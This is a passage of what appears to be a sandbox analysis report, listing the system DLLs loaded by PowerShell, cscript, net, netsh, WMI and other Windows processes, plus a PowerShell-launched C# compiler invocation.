            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: edputil.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: slc.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: sppc.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\cscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
            Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\doskey.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\doskey.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winlangdb.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47mrm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: globinputhost.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: input.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupengine.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
